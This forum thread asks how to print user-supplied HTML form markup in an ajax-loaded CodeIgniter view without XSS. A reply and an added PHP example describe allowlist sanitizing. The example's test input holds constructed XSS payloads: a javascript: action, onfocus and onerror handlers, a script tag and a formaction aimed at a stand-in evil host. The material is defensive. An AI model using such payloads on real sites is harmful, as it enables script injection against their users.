security of views loaded by ajax
#1

[eluser]davdtm[/eluser]
Hi everybody, I have the following problem. I load a view by ajax (through jQuery.load()) and I pass some data to that view, say 'foo', which becomes available inside the view as $_REQUEST['foo']. Within the view I need to print the value of $_REQUEST['foo'], but to prevent XSS problems I know it would be suggested to type print(htmlentities($_REQUEST['foo'])); (or htmlspecialchars(...), which is the same in this case) instead of plain print($_REQUEST['foo']);

Unfortunately, $_REQUEST['foo'] contains html inputs which should generate a form, so they cannot be passed to htmlentities(), because it would clearly translate the html tags. Doing this, I would have a list of html strings instead of the form inputs I need. For this reason I thought it would be enough to use the xss_clean function provided by CI; however, I cannot use get_instance() to access the controller because the view is loaded through ajax and get_instance() seems not to be available. Thus I cannot call xss_clean either. I'm puzzled... what can I do to filter my output against XSS while getting the html data unchanged?

Thanks for any help, best regards

Davide
#2

[eluser]pickupman[/eluser]
As long as you are using .load for a url coming from CI, all functionality is still there. You don't need to call get_instance as it is already loaded for the controller class. By using $_REQUEST, you will bypass any sanitation from the input class. I would suggest doing much like TinyMCE does, and allow only a set of html elements. You will likely need to write a quick helper to do this for you.
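Below is an added example of the kind of allowlist helper the reply above suggests. It is not code from this thread, from CodeIgniter or from TinyMCE: it assumes PHP 7.4 or later with the standard ext/dom and libxml extensions, and the function names, the allowlist and the hostile sample input are illustrative choices made for this example. The idea is that instead of escaping the whole string (which breaks the form) or trusting it (which is XSS), you parse it, keep only the form-building elements and attributes you expect, and drop everything else outright.

```php
<?php
// Added example (not code from the thread, CodeIgniter or TinyMCE): an allowlist
// HTML filter of the kind pickupman's reply suggests. Assumes PHP 7.4+ with the
// standard ext/dom and libxml extensions; the function names and the allowlist
// itself are illustrative choices for this example.

/**
 * Keep only the elements and attributes named in $allowed; drop everything else
 * (the element together with its whole subtree), so <script>, <img onerror> and
 * similar never reach the output. Text nodes are kept; DOM re-serialization
 * escapes them, so they cannot become markup again.
 */
function allowlist_html(string $html, ?array $allowed = null, ?array $input_types = null): string
{
    $allowed = $allowed ?? [
        'form'     => ['action', 'method'],
        'label'    => ['for'],
        'input'    => ['type', 'name', 'value', 'placeholder', 'checked'],
        'select'   => ['name'],
        'option'   => ['value', 'selected'],
        'textarea' => ['name', 'rows', 'cols'],
        'button'   => ['type', 'name'],
        'p'        => [],
        'br'       => [],
    ];
    // Input types that neither load a resource nor run code.
    $input_types = $input_types ?? ['text', 'password', 'hidden', 'checkbox', 'radio', 'submit', 'email', 'number'];

    if (trim($html) === '') {
        return '';
    }

    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);          // hostile markup is expected to be malformed
    // The XML PI makes libxml read the fragment as UTF-8; libxml wraps it in <html><body>.
    $doc->loadHTML('<?xml encoding="utf-8" ?>' . $html);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    sanitize_node($body, $allowed, $input_types);

    // Serialize only the body's children, so the html/body wrapper and the PI stay out.
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function sanitize_node(DOMNode $node, array $allowed, array $input_types): void
{
    // Snapshot the children: removing from a live NodeList while iterating skips siblings.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue;                                  // plain text is harmless once re-serialized
        }
        if (!$child instanceof DOMElement) {
            $node->removeChild($child);                // comments, CDATA, processing instructions
            continue;
        }
        $tag = strtolower($child->tagName);
        if (!isset($allowed[$tag])) {
            $node->removeChild($child);                // unknown element: drop it and its subtree
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            if (!in_array($name, $allowed[$tag], true)) {
                $child->removeAttribute($attr->name);  // covers every on* handler, style, formaction, ...
            } elseif ($name === 'action' && !is_safe_url($attr->value)) {
                $child->removeAttribute($attr->name);
            } elseif ($tag === 'input' && $name === 'type' && !in_array(strtolower($attr->value), $input_types, true)) {
                $child->setAttribute('type', 'text');  // e.g. type="image" would fetch a URL
            }
        }
        sanitize_node($child, $allowed, $input_types);
    }
}

/**
 * Relative URLs and plain http(s) only. The scheme check runs on a copy with control
 * characters removed, because browsers ignore tabs and newlines inside "java\tscript:".
 */
function is_safe_url(string $url): bool
{
    $probe = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    if ($probe === '') {
        return true;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $probe)) {
        return (bool) preg_match('#^https?://#i', $probe);
    }
    return strncmp($probe, '//', 2) !== 0;             // protocol-relative URLs point off-site
}

// Constructed hostile payload: the kind of value a client could send as 'foo'.
$hostile = '<form action="javascript:alert(1)" method="post">'
         . '<label for="user">User</label><input type="text" name="user" onfocus="alert(2)">'
         . '<script>alert(3)</script><img src="x" onerror="alert(4)">'
         . '<input type="image" formaction="//evil.example/" name="go">'
         . '<button type="submit">Go</button></form>';

// In the view this replaces print($_REQUEST['foo']);
echo allowlist_html($hostile), PHP_EOL;
```

In the sample run the form, label, the two inputs and the button survive; the javascript: action, the onfocus handler, the script element, the img element and the formaction attribute are all removed, and the type="image" input is downgraded to a text input. Two things to keep in mind when reusing this: anything outside the allowlist is dropped rather than escaped, which is the safe default for markup you did not write yourself, and every element or attribute you later add to the list needs its own check (an `a` with `href`, for instance, needs the same URL test as `action`). A filter like this is the last line of defence for the output; it does not change the fact that reading $_REQUEST directly skips whatever the input class would have done for you.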



